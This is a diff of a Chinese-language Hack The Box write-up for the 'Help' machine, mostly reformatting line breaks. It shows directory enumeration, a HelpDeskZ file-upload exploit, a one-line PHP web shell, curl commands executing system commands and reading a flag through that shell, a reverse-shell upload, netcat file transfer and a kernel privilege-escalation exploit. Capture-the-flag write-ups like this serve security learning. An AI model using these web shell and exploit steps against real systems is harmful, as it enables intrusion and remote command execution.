--- a/_posts/2019-05-15-Help(HTB渗透测试).md
+++ b/_posts/2019-05-15-Help(HTB渗透测试).md
@@ -32,9 +32,15 @@ Nmap done: 1 IP address (1 host up) scanned in 4.16 seconds
 
 有80看看80有啥信息么 没有啥信息 标准的apache2页面
 
++ dirb http://10.10.10.121/ /usr/share/dirb/wordlists/small.txt 
 
-+ dirb http://10.10.10.121/ /usr/share/dirb/wordlists/small.txt 看看有啥发现 遍历web页面目录
-  真有发现 找到了  http://10.10.10.121/support 有东西 找到一个貌似订票网站 http://10.10.10.121/support  里面要用户名和密码登录 貌似是开源[HelpDeskz]搭建(http://www.helpdeskz.com/)
+  看看有啥发现 遍历web页面目录
+  
+  真有发现 找到了  http://10.10.10.121/support 有东西 
+
+  找到一个貌似订票网站 http://10.10.10.121/support  里面要用户名和密码登录 
+
+  貌似是开源[HelpDeskz]搭建(http://www.helpdeskz.com/)
 
 ``````
   dirb http://10.10.10.121/ /usr/share/dirb/wordlists/small.txt
@@ -93,7 +99,7 @@ DOWNLOADED: 11508 - FOUND: 0
 
 ## 0x02
 
-+ 在[订票页面](http://10.10.10.121/support?v=submit_ticket&actiion=displayForm)貌似可以上传附件
++ 在[订票页面](http://10.10.10.121/support?v=submit_ticket&actiion=displayForm)可以上传附件
 
   在searchsploit看看有没有啥发现 果然有任意文件上传 看poc貌似是源代码上传附件没有做检查，
 
@@ -117,12 +123,17 @@ Shellcodes: No Result
   cat test.php
   <?php echo(system($_GET["cmd"])); ?>
 `````
- + exploits/php/webapps/40300.py 下的需要更改一下少了几个冒号 增加一些打印信息 打印一下获取服务器时区 好能比较时间戳 将本机时区改成GMT
+ + exploits/php/webapps/40300.py 下的需要更改一下少了几个冒号 增加一些打印信息 
+
+  打印一下获取服务器时区 好能比较时间戳 将本机时区改成GMT
+ 
  + 看看源代码找到存放附件的路径 http://10.10.10.121/support/uploads/tickets/
+
  + 网页上传附件 图片验证成功 网页会有File is not_allowed 提示
+ 
  + 运行脚本python 40300.py http://10.10.10.121/support/uploads/tickets/ test.php
+   
    查出上传附件目录名称
-   http://10.10.10.121/support/uploads/tickets/a832970fedd21fb756a2bfbb18544869.php
 
 ``````
 python 40300.py http://10.10.10.121/support/uploads/tickets/ test.php
@@ -142,23 +153,28 @@ has tried http://10.10.10.121/support/uploads/tickets/6e455800983a553f7c2afb10f6
 This is the 4 time:
 found!
 http://10.10.10.121/support/uploads/tickets/a832970fedd21fb756a2bfbb18544869.php
-`````
+
+``````
+
   + 执行一下命令看看是否好用 发现账号是help
 
-`````
+``````
 curl http://10.10.10.121/support/uploads/tickets/a832970fedd21fb756a2bfbb18544869.php?cmd=id
 uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
 uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
-`````
+``````
+  
   + 同样的步骤挂马 上传[反弹shellphp](https://github.com/pentestmonkey/php-reverse-shell)
+  
   + 登录到靶机的help用户下 找到user.txt 
+
 ``````
 curl http://10.10.10.121/support/uploads/tickets/a832970fedd21fb756a2bfbb18544869.php?cmd=cat+/home/help/user.txt
 bb8a7b36bdce0c61ccebaa173ef946af
 ``````
 
 ## 0x04
-+ 获取root权限 利用4.4.0-116-generic下exploits/linux/local/44298.c获取root权限
+  + 获取root权限 利用4.4.0-116-generic下exploits/linux/local/44298.c获取root权限
 
 ``````
 nc -lvp 1234
@@ -175,6 +191,7 @@ help@help:/$
 ``````
 
 + 利用nc上传文件44298.c gcc编译payload获取root 权限以及flag b7fe6082dcdf0c1b1e02ab0d9daddb9
+
 ``````
   nc -w 3 10.10.10.121 39808 < payload.c
   nc -l -p 39808 > payload.c
